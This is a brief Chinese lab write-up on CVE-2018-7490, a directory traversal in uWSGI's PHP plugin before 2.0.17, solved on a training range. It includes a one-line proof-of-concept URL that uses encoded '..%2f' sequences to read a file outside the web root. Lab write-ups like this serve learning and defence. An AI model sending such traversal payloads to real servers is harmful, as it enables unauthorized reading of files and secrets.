标签：插件 7490 漏洞 2f 2018 CVE ..% uWSGI

CVE-2018-7490（目录穿越）
环境：墨者靶场（Linux）
工具：火狐Hackbar
漏洞描述
uWSGI 是一款 Web 应用程序服务器，它实现了 WSGI、uwsgi 和 http 等协议，并支持通过插件来运行各种语言。
uWSGI 2.0.17之前的PHP插件，没有正确的处理DOCUMENT_ROOT检测，导致用户可以通过..%2f来跨越目录，读取或运行DOCUMENT_ROOT目录以外的文件。
漏洞影响
uWSGI < 2.0.17

通过在原链接的基础上构造..%2f来访问key.txt

漏洞POC

http://x.x.x.x:xxxx/..%2f..%2fkey.txt

标签：插件,7490,漏洞,2f,2018,CVE,..%,uWSGI
来源： https://www.cnblogs.com/HK-Fly/p/15601172.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。